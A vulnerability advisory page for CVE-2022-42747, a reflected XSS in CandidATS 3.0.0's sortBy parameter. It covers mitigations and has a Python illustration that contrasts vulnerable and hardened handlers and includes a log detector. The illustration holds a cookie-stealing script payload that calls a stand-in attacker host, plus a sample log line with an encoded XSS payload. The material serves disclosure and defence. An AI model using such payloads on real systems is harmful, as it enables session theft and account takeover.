CVE-2022-42747
Description
CandidATS version 3.0.0, on the 'sortBy' parameter of the 'ajax.php' resource, allows an external attacker to steal the cookies of arbitrary users. This is possible because the application does not properly validate user input against XSS attacks.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CandidATS 3.0.0 contains a reflected XSS in the sortBy parameter of ajax.php, allowing an attacker to steal cookies via a crafted link.
Vulnerability
CandidATS version 3.0.0 contains a reflected cross-site scripting (XSS) vulnerability in the sortBy parameter of the /ajax.php resource [2]. The application neither validates the parameter nor encodes it before reflecting it into the response, so arbitrary JavaScript supplied in the request is injected into the page. The vulnerable URL pattern is /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=&sortDirection=desc&indexFile=... [2].
Exploitation
An unauthenticated remote attacker can craft a link containing JavaScript in the sortBy parameter [2]. To trigger the vulnerability, the attacker must convince an administrator with an active session to open the link (user interaction required) [2]. The attacker needs no network position or credentials of their own; the link can be delivered via email, chat, or other means [2].
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's session, leading to cookie theft and subsequent account takeover [2]. Cookie theft in this way requires the session cookie to be readable by script; if the cookie carries the HttpOnly flag the script cannot read it, but it can still issue requests to the application with the victim's privileges. The attacker gains the privileges of the victim, which for an administrator account means full control over the CandidATS installation [2]. This compromises the confidentiality, integrity, and availability of the system.
Mitigation
At the time of disclosure (October 26, 2022), no patch was available [2]. The vendor (CandidATS) was contacted on October 7, 2022, but no fix had been publicly released [2]. Users should monitor the CandidATS website [1] for updates. As temporary workarounds, restrict which source addresses may reach /ajax.php (the application's own pages call it, so blocking it outright breaks the pipeline views), or add a web application firewall (WAF) rule that rejects requests whose decoded sortBy value contains HTML metacharacters. A WAF rule is a stopgap, not a fix: it must match on the URL-decoded value, and the underlying defect is that the value is reflected without output encoding.
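The following is an added illustration, not CandidATS code (the project is written in PHP; this is Python so it can be run stand-alone). It serves both the Vulnerability section above and the WAF workaround just described: it builds the kind of crafted link the advisory describes, shows a handler that reflects sortBy unencoded beside a hardened one that allowlists the column name and HTML-encodes on output, and runs a detection check over constructed access-log lines. The column names, the injection context (a hidden form field), the attacker host and the log lines are assumptions made for the example.

```python
"""Reflected XSS in a sort parameter: vulnerable vs. hardened handling, plus a
log check for the request shape in the advisory. Illustrative code, not
CandidATS's own; column names, injection context, hosts and logs are assumed."""
import html
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Hypothetical allowlist of sortable columns; a real one lists whatever the
# pipeline view can actually sort on.
ALLOWED_SORT_COLUMNS = {"dateModified", "dateCreated", "firstName", "lastName"}
DEFAULT_SORT = "dateModified"

# Constructed payload of the kind the advisory describes: closes the attribute,
# then opens a script element that ships the session cookie to the attacker.
PAYLOAD = '"><script>document.location="http://attacker.example/?c="+document.cookie</script>'


def crafted_link(payload: str = PAYLOAD) -> str:
    """The link an attacker would send (hypothetical host, parameters from the page)."""
    return "https://candidats.example/ajax.php?" + urlencode({
        "f": "getPipelineJobOrder", "joborderID": "50", "page": "0",
        "entriesPerPage": "15", "sortBy": payload, "sortDirection": "desc"})


def crafted_query(payload: str = PAYLOAD) -> str:
    """Just the query string of the crafted link, as the server would see it."""
    return urlsplit(crafted_link(payload)).query


def sort_by_from_query(query: str) -> str:
    """URL-decoded sortBy value from a query string ('' if absent)."""
    return parse_qs(query, keep_blank_values=True).get("sortBy", [""])[0]


def render_vulnerable(query: str) -> str:
    """Reflects sortBy into markup with no encoding: the bug class in the advisory."""
    return f'<input type="hidden" name="sortBy" value="{sort_by_from_query(query)}">'


def render_hardened(query: str) -> str:
    """Allowlist the value (it names a column, not free text), then encode on
    output anyway so the fix does not depend on the allowlist staying complete."""
    value = sort_by_from_query(query)
    if value not in ALLOWED_SORT_COLUMNS:
        value = DEFAULT_SORT  # safe default instead of echoing the input back
    return f'<input type="hidden" name="sortBy" value="{html.escape(value, quote=True)}">'


# Detection over access logs: a stand-in for the WAF rule suggested above.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
MARKUP_RE = re.compile(r'[<>"\']|javascript:|on\w+\s*=', re.IGNORECASE)


def suspicious_sort_by(log_line: str):
    """Decoded sortBy value if a request to /ajax.php carries markup in it,
    else None. Matching on the decoded value means URL-encoding the payload
    does not evade the check."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != "/ajax.php":
        return None
    value = sort_by_from_query(parts.query)
    return value if MARKUP_RE.search(value) else None


def flagged_lines(lines):
    """(index, decoded sortBy) for every log line the check fires on."""
    hits = []
    for i, line in enumerate(lines):
        value = suspicious_sort_by(line)
        if value is not None:
            hits.append((i, value))
    return hits


# Constructed sample log lines (Apache combined-style), not real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [26/Oct/2022:10:00:01 +0000] "GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateModified&sortDirection=desc HTTP/1.1" 200 812',
    '10.0.0.9 - - [26/Oct/2022:10:00:07 +0000] "GET /ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&sortDirection=desc HTTP/1.1" 200 830',
    '10.0.0.9 - - [26/Oct/2022:10:00:09 +0000] "GET /index.php?m=home HTTP/1.1" 200 2210',
]


if __name__ == "__main__":
    q = crafted_query()
    print(render_vulnerable(q))  # payload lands in the page verbatim
    print(render_hardened(q))    # falls back to the default column, encoded
    print(flagged_lines(SAMPLE_LOG))
```

The allowlist is the real fix for a parameter that names a column; the output encoding is kept so the handler stays safe if someone later adds a column without updating the list. The log check is deliberately written over the decoded value, which is the mistake most hand-written WAF patterns make.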
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
CandidATS / CandidATS
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.